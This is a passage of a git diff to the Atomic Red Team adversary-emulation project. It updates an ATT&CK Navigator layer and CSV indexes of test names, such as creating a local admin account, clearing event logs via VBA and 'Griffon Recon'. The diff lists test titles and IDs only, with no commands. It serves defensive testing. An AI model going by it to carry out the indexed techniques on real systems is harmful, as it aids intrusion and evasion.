:true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index c6f0fcb8..36e0927d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -37,6 +37,7 @@ privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PREL privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt @@ -138,6 +139,7 @@ persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657 persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt +persistence,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt @@ -298,6 +300,7 @@ defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell +defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt @@ -367,6 +370,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9 defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell +defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash @@ -399,6 +403,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh +defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks,58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt @@ -640,6 +645,7 @@ discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt +discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh @@ -768,5 +774,6 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell +initial-access,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 2bcc0b8f..18fe1726 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -86,6 +86,7 @@ privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Not privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt +privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell @@ -147,6 +148,7 @@ defense-evasion,T1070.003,Clear Command History,9,Prevent Powershell History Log defense-evasion,T1070.003,Clear Command History,10,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell +defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt @@ -194,6 +196,7 @@ defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f- defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell +defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt @@ -208,6 +211,7 @@ defense-evasion,T1218.004,InstallUtil,5,InstallUtil Uninstall method call - /U v defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell +defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks,58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt @@ -336,6 +340,7 @@ persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt +persistence,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt persistence,T1546.007,Netsh 